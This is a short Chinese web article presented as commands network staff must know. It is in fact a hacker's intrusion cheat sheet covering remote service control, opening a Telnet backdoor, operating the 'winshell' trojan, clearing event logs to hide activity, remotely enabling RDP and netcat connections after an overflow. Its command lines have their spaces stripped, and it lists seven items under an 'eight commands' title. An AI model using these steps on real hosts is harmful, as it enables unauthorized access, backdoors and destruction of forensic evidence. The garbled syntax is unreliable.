RSS

网络人员必须知道的八条命令

网络人员必须知道的八条命令

一、netsvc.exe

  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

  netsvc/list地址

  netsvcschedule地址/query

  netsvc地址schedule/start

  二、OpenTelnet.exe

  远程启动主机的Telnet服务,并绑定端口到7878,例如:

  OpenTelnet地址用户名密码17878

  然后就可以telnet到主机的7878端口,进入DOS方式下:

  telnetIP地址7878

  三、winshell.exe

  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:

  pPath(查看winshell主程序的路径信息)

  breBoot(重新启动机器)

  dshutDown(关闭机器)

  sShell(执行后你就会看到可爱的“C:\>”)

  xeXit(退出本次登录会话,此命令并不终止winshell的运行)

  CMD>(通过http下载其他网站上的文件到运行winshell的机器上)

  四、3389登陆器,GUI方式登录远程主机的

  五、elsave.exe

  事件日志清除工具

  elsave-s地址-l\"application\"-C

  elsave-s地址-l\"system\"-C

  elsave-s地址-l\"security\"-C

  执行后成功清除应用程序日志,系统日志,安全日志

  六、hbulot.exe

  开启win2kserver和winxp的3389服务

  hbulot[/r]

  使用/r表示安装完成后自动重起目标使设置生效。

 


  七、nc.exe(netcat.exe)

  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

  想要连接到某处:nc[-options]hostnameport[s][ports]...

  绑定端口等待连接:nc-l-pport[-options][hostname][port]

[时间:2010-08-14]
相关文章